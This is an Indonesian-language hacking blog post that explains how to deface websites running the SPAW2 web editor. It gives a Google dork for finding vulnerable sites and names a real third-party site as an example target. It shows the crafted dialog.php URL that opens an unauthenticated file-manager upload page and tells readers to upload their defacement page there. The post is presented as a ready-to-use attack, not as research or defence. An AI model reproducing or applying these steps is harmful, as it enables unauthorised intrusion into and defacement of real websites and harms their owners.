kali ini saya ingin share tentang SPAW vulnerable , exploit ini saya dapat dari om Z190T, thanks om.
langsung aja, cekidot. .
pergi ke om google dan ketikan dork berikut ini:
-----------------------------------------------------------
-----------------------------------------------------------
dork : inurl:"spaw2/dialogs/" OR inurl:"spaw2/uploads/files/"
-----------------------------------------------------------
-----------------------------------------------------------
nah jika sudah dapat targetnya,
contoh nya : http://climatechange.jgsee.org/Admin/spaw2/uploads/files/CC%20Book/??????????%20CC%20Vol2.pdf
contoh nya : http://climatechange.jgsee.org/Admin/spaw2/uploads/files/CC%20Book/??????????%20CC%20Vol2.pdf
spaw2/uploads/files/CC Book/?????????? CC Vol2.pdf
GANTI DENGAN
spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2&lang=es&charset=&scid=cf73b58bb51c52235494da752d98cac9&type=files
hasil nya seperti ini ->> http://climatechange.jgsee.org/Admin/spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2&lang=es&charset=&scid=cf73b58bb51c52235494da752d98cac9&type=files
setela itu pasti ada halaman upload, nah jika ada segera upload page deface kamu, jika berhasil maka page deface kamu akan muncul.
0 komentar:
Posting Komentar
sedikit komentar anda sangat berarti buat saya. ;)